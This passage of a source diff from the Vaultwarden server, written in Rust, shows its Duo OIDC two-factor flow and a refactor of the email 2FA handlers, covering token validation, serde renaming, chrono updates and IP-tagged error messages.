Ok(r) => r,
|
||||||
|
Err(e) => err!(format!("Error requesting Duo health check: {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
let response: HealthCheckResponse = match res.json::<HealthCheckResponse>().await {
|
||||||
|
Ok(r) => r,
|
||||||
|
Err(e) => err!(format!("Duo health check response decode error: {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
let health_stat: String = match response {
|
||||||
|
HealthCheckResponse::HealthOK {
|
||||||
|
stat,
|
||||||
|
} => stat,
|
||||||
|
HealthCheckResponse::HealthFail {
|
||||||
|
message,
|
||||||
|
message_detail,
|
||||||
|
} => err!(format!("Duo health check FAIL response, msg: {message}, detail: {message_detail}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
if health_stat != "OK" {
|
||||||
|
err!(format!("Duo health check failed, got OK-like body with stat {health_stat}"));
|
||||||
|
}
|
||||||
|
|
||||||
|
Ok(())
|
||||||
|
}
|
||||||
|
|
||||||
|
// Constructs the URL for the authorization request endpoint on Duo's service.
|
||||||
|
// Clients are sent here to continue authentication.
|
||||||
|
// https://duo.com/docs/oauthapi#authorization-request
|
||||||
|
fn make_authz_req_url(&self, duo_username: &str, state: String, nonce: String) -> Result<String, Error> {
|
||||||
|
let now = Utc::now().timestamp();
|
||||||
|
|
||||||
|
let jwt_payload = AuthorizationRequest {
|
||||||
|
response_type: String::from("code"),
|
||||||
|
scope: String::from("openid"),
|
||||||
|
exp: now + JWT_VALIDITY_SECS,
|
||||||
|
client_id: self.client_id.clone(),
|
||||||
|
redirect_uri: self.redirect_uri.clone(),
|
||||||
|
state,
|
||||||
|
duo_uname: String::from(duo_username),
|
||||||
|
iss: self.client_id.clone(),
|
||||||
|
aud: format!("https://{}", self.api_host),
|
||||||
|
nonce,
|
||||||
|
};
|
||||||
|
|
||||||
|
let token = self.encode_duo_jwt(jwt_payload)?;
|
||||||
|
|
||||||
|
let authz_endpoint = format!("https://{}/oauth/v1/authorize", self.api_host);
|
||||||
|
let mut auth_url = match Url::parse(authz_endpoint.as_str()) {
|
||||||
|
Ok(url) => url,
|
||||||
|
Err(e) => err!(format!("Error parsing Duo authorization URL: {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
{
|
||||||
|
let mut query_params = auth_url.query_pairs_mut();
|
||||||
|
query_params.append_pair("response_type", "code");
|
||||||
|
query_params.append_pair("client_id", self.client_id.as_str());
|
||||||
|
query_params.append_pair("request", token.as_str());
|
||||||
|
}
|
||||||
|
|
||||||
|
let final_auth_url = auth_url.to_string();
|
||||||
|
Ok(final_auth_url)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Exchange the authorization code obtained from an access token provided by the user
|
||||||
|
// for the result of the MFA and validate.
|
||||||
|
// See: https://duo.com/docs/oauthapi#access-token (under Response Format)
|
||||||
|
async fn exchange_authz_code_for_result(
|
||||||
|
&self,
|
||||||
|
duo_code: &str,
|
||||||
|
duo_username: &str,
|
||||||
|
nonce: &str,
|
||||||
|
) -> Result<(), Error> {
|
||||||
|
if duo_code.is_empty() {
|
||||||
|
err!("Empty Duo authorization code")
|
||||||
|
}
|
||||||
|
|
||||||
|
let token_url = format!("https://{}/oauth/v1/token", self.api_host);
|
||||||
|
|
||||||
|
let jwt_payload = self.new_client_assertion(&token_url);
|
||||||
|
|
||||||
|
let token = match self.encode_duo_jwt(jwt_payload) {
|
||||||
|
Ok(token) => token,
|
||||||
|
Err(e) => return Err(e),
|
||||||
|
};
|
||||||
|
|
||||||
|
let mut post_body = HashMap::new();
|
||||||
|
post_body.insert("grant_type", String::from("authorization_code"));
|
||||||
|
post_body.insert("code", String::from(duo_code));
|
||||||
|
|
||||||
|
// Must be the same URL that was supplied in the authorization request for the supplied duo_code
|
||||||
|
post_body.insert("redirect_uri", self.redirect_uri.clone());
|
||||||
|
|
||||||
|
post_body
|
||||||
|
.insert("client_assertion_type", String::from("urn:ietf:params:oauth:client-assertion-type:jwt-bearer"));
|
||||||
|
post_body.insert("client_assertion", token);
|
||||||
|
|
||||||
|
let res = match make_http_request(reqwest::Method::POST, &token_url)?
|
||||||
|
.header(header::USER_AGENT, "vaultwarden:Duo/2.0 (Rust)")
|
||||||
|
.form(&post_body)
|
||||||
|
.send()
|
||||||
|
.await
|
||||||
|
{
|
||||||
|
Ok(r) => r,
|
||||||
|
Err(e) => err!(format!("Error exchanging Duo code: {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
let status_code = res.status();
|
||||||
|
if status_code != StatusCode::OK {
|
||||||
|
err!(format!("Failure response from Duo: {status_code}"))
|
||||||
|
}
|
||||||
|
|
||||||
|
let response: IdTokenResponse = match res.json::<IdTokenResponse>().await {
|
||||||
|
Ok(r) => r,
|
||||||
|
Err(e) => err!(format!("Error decoding ID token response: {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
let mut validation = Validation::new(DUO_RESP_SIGNATURE_ALG);
|
||||||
|
validation.set_required_spec_claims(&["exp", "aud", "iss"]);
|
||||||
|
validation.set_audience(&[&self.client_id]);
|
||||||
|
validation.set_issuer(&[token_url.as_str()]);
|
||||||
|
|
||||||
|
let token_data = match jsonwebtoken::decode::<IdTokenClaims>(
|
||||||
|
&response.id_token,
|
||||||
|
&DecodingKey::from_secret(self.client_secret.as_bytes()),
|
||||||
|
&validation,
|
||||||
|
) {
|
||||||
|
Ok(c) => c,
|
||||||
|
Err(e) => err!(format!("Failed to decode Duo token {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
let matching_nonces = crypto::ct_eq(nonce, &token_data.claims.nonce);
|
||||||
|
let matching_usernames = crypto::ct_eq(duo_username, &token_data.claims.preferred_username);
|
||||||
|
|
||||||
|
if !(matching_nonces && matching_usernames) {
|
||||||
|
err!("Error validating Duo authorization, nonce or username mismatch.")
|
||||||
|
};
|
||||||
|
|
||||||
|
Ok(())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
struct DuoAuthContext {
|
||||||
|
pub state: String,
|
||||||
|
pub user_email: String,
|
||||||
|
pub nonce: String,
|
||||||
|
pub exp: i64,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Given a state string, retrieve the associated Duo auth context and
|
||||||
|
// delete the retrieved state from the database.
|
||||||
|
async fn extract_context(state: &str, conn: &mut DbConn) -> Option<DuoAuthContext> {
|
||||||
|
let ctx: TwoFactorDuoContext = match TwoFactorDuoContext::find_by_state(state, conn).await {
|
||||||
|
Some(c) => c,
|
||||||
|
None => return None,
|
||||||
|
};
|
||||||
|
|
||||||
|
if ctx.exp < Utc::now().timestamp() {
|
||||||
|
ctx.delete(conn).await.ok();
|
||||||
|
return None;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Copy the context data, so that we can delete the context from
|
||||||
|
// the database before returning.
|
||||||
|
let ret_ctx = DuoAuthContext {
|
||||||
|
state: ctx.state.clone(),
|
||||||
|
user_email: ctx.user_email.clone(),
|
||||||
|
nonce: ctx.nonce.clone(),
|
||||||
|
exp: ctx.exp,
|
||||||
|
};
|
||||||
|
|
||||||
|
ctx.delete(conn).await.ok();
|
||||||
|
Some(ret_ctx)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Task to clean up expired Duo authentication contexts that may have accumulated in the database.
|
||||||
|
pub async fn purge_duo_contexts(pool: DbPool) {
|
||||||
|
debug!("Purging Duo authentication contexts");
|
||||||
|
if let Ok(mut conn) = pool.get().await {
|
||||||
|
TwoFactorDuoContext::purge_expired_duo_contexts(&mut conn).await;
|
||||||
|
} else {
|
||||||
|
error!("Failed to get DB connection while purging expired Duo authentications")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Construct the url that Duo should redirect users to.
|
||||||
|
fn make_callback_url(client_name: &str) -> Result<String, Error> {
|
||||||
|
// Get the location of this application as defined in the config.
|
||||||
|
let base = match Url::parse(&format!("{}/", CONFIG.domain())) {
|
||||||
|
Ok(url) => url,
|
||||||
|
Err(e) => err!(format!("Error parsing configured domain URL (check your domain configuration): {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
// Add the client redirect bridge location
|
||||||
|
let mut callback = match base.join(DUO_REDIRECT_LOCATION) {
|
||||||
|
Ok(url) => url,
|
||||||
|
Err(e) => err!(format!("Error constructing Duo redirect URL (check your domain configuration): {e:?}")),
|
||||||
|
};
|
||||||
|
|
||||||
|
// Add the 'client' string with the authenticating device type. The callback connector uses this
|
||||||
|
// information to figure out how it should handle certain clients.
|
||||||
|
{
|
||||||
|
let mut query_params = callback.query_pairs_mut();
|
||||||
|
query_params.append_pair("client", client_name);
|
||||||
|
}
|
||||||
|
Ok(callback.to_string())
|
||||||
|
}
|
||||||
|
|
||||||
|
// Pre-redirect first stage of the Duo OIDC authentication flow.
|
||||||
|
// Returns the "AuthUrl" that should be returned to clients for MFA.
|
||||||
|
pub async fn get_duo_auth_url(
|
||||||
|
email: &str,
|
||||||
|
client_id: &str,
|
||||||
|
device_identifier: &DeviceId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Result<String, Error> {
|
||||||
|
let (ik, sk, _, host) = get_duo_keys_email(email, conn).await?;
|
||||||
|
|
||||||
|
let callback_url = match make_callback_url(client_id) {
|
||||||
|
Ok(url) => url,
|
||||||
|
Err(e) => return Err(e),
|
||||||
|
};
|
||||||
|
|
||||||
|
let client = DuoClient::new(ik, sk, host, callback_url);
|
||||||
|
|
||||||
|
match client.health_check().await {
|
||||||
|
Ok(()) => {}
|
||||||
|
Err(e) => return Err(e),
|
||||||
|
};
|
||||||
|
|
||||||
|
// Generate random OAuth2 state and OIDC Nonce
|
||||||
|
let state: String = crypto::get_random_string_alphanum(STATE_LENGTH);
|
||||||
|
let nonce: String = crypto::get_random_string_alphanum(STATE_LENGTH);
|
||||||
|
|
||||||
|
// Bind the nonce to the device that's currently authing by hashing the nonce and device id
|
||||||
|
// and sending the result as the OIDC nonce.
|
||||||
|
let d: Digest = digest(&SHA512_256, format!("{nonce}{device_identifier}").as_bytes());
|
||||||
|
let hash: String = HEXLOWER.encode(d.as_ref());
|
||||||
|
|
||||||
|
match TwoFactorDuoContext::save(state.as_str(), email, nonce.as_str(), CTX_VALIDITY_SECS, conn).await {
|
||||||
|
Ok(()) => client.make_authz_req_url(email, state, hash),
|
||||||
|
Err(e) => err!(format!("Error saving Duo authentication context: {e:?}")),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Post-redirect second stage of the Duo OIDC authentication flow.
|
||||||
|
// Exchanges an authorization code for the MFA result with Duo's API and validates the result.
|
||||||
|
pub async fn validate_duo_login(
|
||||||
|
email: &str,
|
||||||
|
two_factor_token: &str,
|
||||||
|
client_id: &str,
|
||||||
|
device_identifier: &DeviceId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
|
// Result supplied to us by clients in the form "<authz code>|<state>"
|
||||||
|
let split: Vec<&str> = two_factor_token.split('|').collect();
|
||||||
|
if split.len() != 2 {
|
||||||
|
err!(
|
||||||
|
"Invalid response length",
|
||||||
|
ErrorEvent {
|
||||||
|
event: EventType::UserFailedLogIn2fa
|
||||||
|
}
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
let code = split[0];
|
||||||
|
let state = split[1];
|
||||||
|
|
||||||
|
let (ik, sk, _, host) = get_duo_keys_email(email, conn).await?;
|
||||||
|
|
||||||
|
// Get the context by the state reported by the client. If we don't have one,
|
||||||
|
// it means the context is either missing or expired.
|
||||||
|
let ctx = match extract_context(state, conn).await {
|
||||||
|
Some(c) => c,
|
||||||
|
None => {
|
||||||
|
err!(
|
||||||
|
"Error validating duo authentication",
|
||||||
|
ErrorEvent {
|
||||||
|
event: EventType::UserFailedLogIn2fa
|
||||||
|
}
|
||||||
|
)
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
// Context validation steps
|
||||||
|
let matching_usernames = crypto::ct_eq(email, &ctx.user_email);
|
||||||
|
|
||||||
|
// Probably redundant, but we're double-checking them anyway.
|
||||||
|
let matching_states = crypto::ct_eq(state, &ctx.state);
|
||||||
|
let unexpired_context = ctx.exp > Utc::now().timestamp();
|
||||||
|
|
||||||
|
if !(matching_usernames && matching_states && unexpired_context) {
|
||||||
|
err!(
|
||||||
|
"Error validating duo authentication",
|
||||||
|
ErrorEvent {
|
||||||
|
event: EventType::UserFailedLogIn2fa
|
||||||
|
}
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
let callback_url = match make_callback_url(client_id) {
|
||||||
|
Ok(url) => url,
|
||||||
|
Err(e) => return Err(e),
|
||||||
|
};
|
||||||
|
|
||||||
|
let client = DuoClient::new(ik, sk, host, callback_url);
|
||||||
|
|
||||||
|
match client.health_check().await {
|
||||||
|
Ok(()) => {}
|
||||||
|
Err(e) => return Err(e),
|
||||||
|
};
|
||||||
|
|
||||||
|
let d: Digest = digest(&SHA512_256, format!("{}{device_identifier}", ctx.nonce).as_bytes());
|
||||||
|
let hash: String = HEXLOWER.encode(d.as_ref());
|
||||||
|
|
||||||
|
match client.exchange_authz_code_for_result(code, email, hash.as_str()).await {
|
||||||
|
Ok(_) => Ok(()),
|
||||||
|
Err(_) => {
|
||||||
|
err!(
|
||||||
|
"Error validating duo authentication",
|
||||||
|
ErrorEvent {
|
||||||
|
event: EventType::UserFailedLogIn2fa
|
||||||
|
}
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -1,16 +1,16 @@
|
|||||||
use chrono::{Duration, NaiveDateTime, Utc};
|
use chrono::{DateTime, TimeDelta, Utc};
|
||||||
use rocket::serde::json::Json;
|
use rocket::serde::json::Json;
|
||||||
use rocket::Route;
|
use rocket::Route;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{
|
||||||
core::{log_user_event, two_factor::_generate_recover_code},
|
core::{log_user_event, two_factor::_generate_recover_code},
|
||||||
EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
|
EmptyResult, JsonResult, PasswordOrOtpData,
|
||||||
},
|
},
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
crypto,
|
crypto,
|
||||||
db::{
|
db::{
|
||||||
models::{EventType, TwoFactor, TwoFactorType},
|
models::{EventType, TwoFactor, TwoFactorType, User, UserId},
|
||||||
DbConn,
|
DbConn,
|
||||||
},
|
},
|
||||||
error::{Error, MapResult},
|
error::{Error, MapResult},
|
||||||
@@ -22,28 +22,30 @@ pub fn routes() -> Vec<Route> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct SendEmailLoginData {
|
struct SendEmailLoginData {
|
||||||
Email: String,
|
// DeviceIdentifier: String, // Currently not used
|
||||||
MasterPasswordHash: String,
|
#[serde(alias = "Email")]
|
||||||
|
email: String,
|
||||||
|
#[serde(alias = "MasterPasswordHash")]
|
||||||
|
master_password_hash: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
/// User is trying to login and wants to use email 2FA.
|
/// User is trying to login and wants to use email 2FA.
|
||||||
/// Does not require Bearer token
|
/// Does not require Bearer token
|
||||||
#[post("/two-factor/send-email-login", data = "<data>")] // JsonResult
|
#[post("/two-factor/send-email-login", data = "<data>")] // JsonResult
|
||||||
async fn send_email_login(data: JsonUpcase<SendEmailLoginData>, mut conn: DbConn) -> EmptyResult {
|
async fn send_email_login(data: Json<SendEmailLoginData>, mut conn: DbConn) -> EmptyResult {
|
||||||
let data: SendEmailLoginData = data.into_inner().data;
|
let data: SendEmailLoginData = data.into_inner();
|
||||||
|
|
||||||
use crate::db::models::User;
|
use crate::db::models::User;
|
||||||
|
|
||||||
// Get the user
|
// Get the user
|
||||||
let user = match User::find_by_mail(&data.Email, &mut conn).await {
|
let Some(user) = User::find_by_mail(&data.email, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Username or password is incorrect. Try again.")
|
||||||
None => err!("Username or password is incorrect. Try again."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// Check password
|
// Check password
|
||||||
if !user.check_valid_password(&data.MasterPasswordHash) {
|
if !user.check_valid_password(&data.master_password_hash) {
|
||||||
err!("Username or password is incorrect. Try again.")
|
err!("Username or password is incorrect. Try again.")
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -57,10 +59,9 @@ async fn send_email_login(data: JsonUpcase<SendEmailLoginData>, mut conn: DbConn
|
|||||||
}
|
}
|
||||||
|
|
||||||
/// Generate the token, save the data for later verification and send email to user
|
/// Generate the token, save the data for later verification and send email to user
|
||||||
pub async fn send_token(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn send_token(user_id: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
let type_ = TwoFactorType::Email as i32;
|
let type_ = TwoFactorType::Email as i32;
|
||||||
let mut twofactor =
|
let mut twofactor = TwoFactor::find_by_user_and_type(user_id, type_, conn).await.map_res("Two factor not found")?;
|
||||||
TwoFactor::find_by_user_and_type(user_uuid, type_, conn).await.map_res("Two factor not found")?;
|
|
||||||
|
|
||||||
let generated_token = crypto::generate_email_token(CONFIG.email_token_size());
|
let generated_token = crypto::generate_email_token(CONFIG.email_token_size());
|
||||||
|
|
||||||
@@ -76,8 +77,8 @@ pub async fn send_token(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
|||||||
|
|
||||||
/// When user clicks on Manage email 2FA show the user the related information
|
/// When user clicks on Manage email 2FA show the user the related information
|
||||||
#[post("/two-factor/get-email", data = "<data>")]
|
#[post("/two-factor/get-email", data = "<data>")]
|
||||||
async fn get_email(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn get_email(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: PasswordOrOtpData = data.into_inner().data;
|
let data: PasswordOrOtpData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
data.validate(&user, false, &mut conn).await?;
|
data.validate(&user, false, &mut conn).await?;
|
||||||
@@ -92,30 +93,30 @@ async fn get_email(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut co
|
|||||||
};
|
};
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Email": mfa_email,
|
"email": mfa_email,
|
||||||
"Enabled": enabled,
|
"enabled": enabled,
|
||||||
"Object": "twoFactorEmail"
|
"object": "twoFactorEmail"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct SendEmailData {
|
struct SendEmailData {
|
||||||
/// Email where 2FA codes will be sent to, can be different than user email account.
|
/// Email where 2FA codes will be sent to, can be different than user email account.
|
||||||
Email: String,
|
email: String,
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Send a verification email to the specified email address to check whether it exists/belongs to user.
|
/// Send a verification email to the specified email address to check whether it exists/belongs to user.
|
||||||
#[post("/two-factor/send-email", data = "<data>")]
|
#[post("/two-factor/send-email", data = "<data>")]
|
||||||
async fn send_email(data: JsonUpcase<SendEmailData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
async fn send_email(data: Json<SendEmailData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
||||||
let data: SendEmailData = data.into_inner().data;
|
let data: SendEmailData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
PasswordOrOtpData {
|
PasswordOrOtpData {
|
||||||
MasterPasswordHash: data.MasterPasswordHash,
|
master_password_hash: data.master_password_hash,
|
||||||
Otp: data.Otp,
|
otp: data.otp,
|
||||||
}
|
}
|
||||||
.validate(&user, false, &mut conn)
|
.validate(&user, false, &mut conn)
|
||||||
.await?;
|
.await?;
|
||||||
@@ -131,7 +132,7 @@ async fn send_email(data: JsonUpcase<SendEmailData>, headers: Headers, mut conn:
|
|||||||
}
|
}
|
||||||
|
|
||||||
let generated_token = crypto::generate_email_token(CONFIG.email_token_size());
|
let generated_token = crypto::generate_email_token(CONFIG.email_token_size());
|
||||||
let twofactor_data = EmailTokenData::new(data.Email, generated_token);
|
let twofactor_data = EmailTokenData::new(data.email, generated_token);
|
||||||
|
|
||||||
// Uses EmailVerificationChallenge as type to show that it's not verified yet.
|
// Uses EmailVerificationChallenge as type to show that it's not verified yet.
|
||||||
let twofactor = TwoFactor::new(user.uuid, TwoFactorType::EmailVerificationChallenge, twofactor_data.to_json());
|
let twofactor = TwoFactor::new(user.uuid, TwoFactorType::EmailVerificationChallenge, twofactor_data.to_json());
|
||||||
@@ -143,24 +144,24 @@ async fn send_email(data: JsonUpcase<SendEmailData>, headers: Headers, mut conn:
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Serialize)]
|
#[derive(Deserialize, Serialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EmailData {
|
struct EmailData {
|
||||||
Email: String,
|
email: String,
|
||||||
Token: String,
|
token: String,
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Verify email belongs to user and can be used for 2FA email codes.
|
/// Verify email belongs to user and can be used for 2FA email codes.
|
||||||
#[put("/two-factor/email", data = "<data>")]
|
#[put("/two-factor/email", data = "<data>")]
|
||||||
async fn email(data: JsonUpcase<EmailData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn email(data: Json<EmailData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: EmailData = data.into_inner().data;
|
let data: EmailData = data.into_inner();
|
||||||
let mut user = headers.user;
|
let mut user = headers.user;
|
||||||
|
|
||||||
// This is the last step in the verification process, delete the otp directly afterwards
|
// This is the last step in the verification process, delete the otp directly afterwards
|
||||||
PasswordOrOtpData {
|
PasswordOrOtpData {
|
||||||
MasterPasswordHash: data.MasterPasswordHash,
|
master_password_hash: data.master_password_hash,
|
||||||
Otp: data.Otp,
|
otp: data.otp,
|
||||||
}
|
}
|
||||||
.validate(&user, true, &mut conn)
|
.validate(&user, true, &mut conn)
|
||||||
.await?;
|
.await?;
|
||||||
@@ -171,12 +172,11 @@ async fn email(data: JsonUpcase<EmailData>, headers: Headers, mut conn: DbConn)
|
|||||||
|
|
||||||
let mut email_data = EmailTokenData::from_json(&twofactor.data)?;
|
let mut email_data = EmailTokenData::from_json(&twofactor.data)?;
|
||||||
|
|
||||||
let issued_token = match &email_data.last_token {
|
let Some(issued_token) = &email_data.last_token else {
|
||||||
Some(t) => t,
|
err!("No token available")
|
||||||
_ => err!("No token available"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if !crypto::ct_eq(issued_token, data.Token) {
|
if !crypto::ct_eq(issued_token, data.token) {
|
||||||
err!("Token is invalid")
|
err!("Token is invalid")
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -190,26 +190,31 @@ async fn email(data: JsonUpcase<EmailData>, headers: Headers, mut conn: DbConn)
|
|||||||
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Email": email_data.email,
|
"email": email_data.email,
|
||||||
"Enabled": "true",
|
"enabled": "true",
|
||||||
"Object": "twoFactorEmail"
|
"object": "twoFactorEmail"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Validate the email code when used as TwoFactor token mechanism
|
/// Validate the email code when used as TwoFactor token mechanism
|
||||||
pub async fn validate_email_code_str(user_uuid: &str, token: &str, data: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn validate_email_code_str(
|
||||||
|
user_id: &UserId,
|
||||||
|
token: &str,
|
||||||
|
data: &str,
|
||||||
|
ip: &std::net::IpAddr,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
let mut email_data = EmailTokenData::from_json(data)?;
|
let mut email_data = EmailTokenData::from_json(data)?;
|
||||||
let mut twofactor = TwoFactor::find_by_user_and_type(user_uuid, TwoFactorType::Email as i32, conn)
|
let mut twofactor = TwoFactor::find_by_user_and_type(user_id, TwoFactorType::Email as i32, conn)
|
||||||
.await
|
.await
|
||||||
.map_res("Two factor not found")?;
|
.map_res("Two factor not found")?;
|
||||||
let issued_token = match &email_data.last_token {
|
let Some(issued_token) = &email_data.last_token else {
|
||||||
Some(t) => t,
|
err!(
|
||||||
_ => err!(
|
format!("No token available! IP: {ip}"),
|
||||||
"No token available",
|
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
event: EventType::UserFailedLogIn2fa
|
event: EventType::UserFailedLogIn2fa
|
||||||
}
|
}
|
||||||
),
|
)
|
||||||
};
|
};
|
||||||
|
|
||||||
if !crypto::ct_eq(issued_token, token) {
|
if !crypto::ct_eq(issued_token, token) {
|
||||||
@@ -221,7 +226,7 @@ pub async fn validate_email_code_str(user_uuid: &str, token: &str, data: &str, c
|
|||||||
twofactor.save(conn).await?;
|
twofactor.save(conn).await?;
|
||||||
|
|
||||||
err!(
|
err!(
|
||||||
"Token is invalid",
|
format!("Token is invalid! IP: {ip}"),
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
event: EventType::UserFailedLogIn2fa
|
event: EventType::UserFailedLogIn2fa
|
||||||
}
|
}
|
||||||
@@ -232,9 +237,9 @@ pub async fn validate_email_code_str(user_uuid: &str, token: &str, data: &str, c
|
|||||||
twofactor.data = email_data.to_json();
|
twofactor.data = email_data.to_json();
|
||||||
twofactor.save(conn).await?;
|
twofactor.save(conn).await?;
|
||||||
|
|
||||||
let date = NaiveDateTime::from_timestamp_opt(email_data.token_sent, 0).expect("Email token timestamp invalid.");
|
let date = DateTime::from_timestamp(email_data.token_sent, 0).expect("Email token timestamp invalid.").naive_utc();
|
||||||
let max_time = CONFIG.email_expiration_time() as i64;
|
let max_time = CONFIG.email_expiration_time() as i64;
|
||||||
if date + Duration::seconds(max_time) < Utc::now().naive_utc() {
|
if date + TimeDelta::try_seconds(max_time).unwrap() < Utc::now().naive_utc() {
|
||||||
err!(
|
err!(
|
||||||
"Token has expired",
|
"Token has expired",
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
@@ -265,14 +270,14 @@ impl EmailTokenData {
|
|||||||
EmailTokenData {
|
EmailTokenData {
|
||||||
email,
|
email,
|
||||||
last_token: Some(token),
|
last_token: Some(token),
|
||||||
token_sent: Utc::now().naive_utc().timestamp(),
|
token_sent: Utc::now().timestamp(),
|
||||||
attempts: 0,
|
attempts: 0,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn set_token(&mut self, token: String) {
|
pub fn set_token(&mut self, token: String) {
|
||||||
self.last_token = Some(token);
|
self.last_token = Some(token);
|
||||||
self.token_sent = Utc::now().naive_utc().timestamp();
|
self.token_sent = Utc::now().timestamp();
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn reset_token(&mut self) {
|
pub fn reset_token(&mut self) {
|
||||||
@@ -289,7 +294,7 @@ impl EmailTokenData {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub fn from_json(string: &str) -> Result<EmailTokenData, Error> {
|
pub fn from_json(string: &str) -> Result<EmailTokenData, Error> {
|
||||||
let res: Result<EmailTokenData, crate::serde_json::Error> = serde_json::from_str(string);
|
let res: Result<EmailTokenData, serde_json::Error> = serde_json::from_str(string);
|
||||||
match res {
|
match res {
|
||||||
Ok(x) => Ok(x),
|
Ok(x) => Ok(x),
|
||||||
Err(_) => err!("Could not decode EmailTokenData from string"),
|
Err(_) => err!("Could not decode EmailTokenData from string"),
|
||||||
@@ -297,6 +302,15 @@ impl EmailTokenData {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn activate_email_2fa(user: &User, conn: &mut DbConn) -> EmptyResult {
|
||||||
|
if user.verified_at.is_none() {
|
||||||
|
err!("Auto-enabling of email 2FA failed because the users email address has not been verified!");
|
||||||
|
}
|
||||||
|
let twofactor_data = EmailTokenData::new(user.email.clone(), String::new());
|
||||||
|
let twofactor = TwoFactor::new(user.uuid.clone(), TwoFactorType::Email, twofactor_data.to_json());
|
||||||
|
twofactor.save(conn).await
|
||||||
|
}
|
||||||
|
|
||||||
/// Takes an email address and obscures it by replacing it with asterisks except two characters.
|
/// Takes an email address and obscures it by replacing it with asterisks except two characters.
|
||||||
pub fn obscure_email(email: &str) -> String {
|
pub fn obscure_email(email: &str) -> String {
|
||||||
let split: Vec<&str> = email.rsplitn(2, '@').collect();
|
let split: Vec<&str> = email.rsplitn(2, '@').collect();
|
||||||
@@ -315,7 +329,15 @@ pub fn obscure_email(email: &str) -> String {
|
|||||||
}
|
}
|
||||||
};
|
};
|
||||||
|
|
||||||
format!("{}@{}", new_name, &domain)
|
format!("{new_name}@{domain}")
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_and_activate_email_2fa(user_id: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
|
if let Some(user) = User::find_by_uuid(user_id, conn).await {
|
||||||
|
activate_email_2fa(&user, conn).await
|
||||||
|
} else {
|
||||||
|
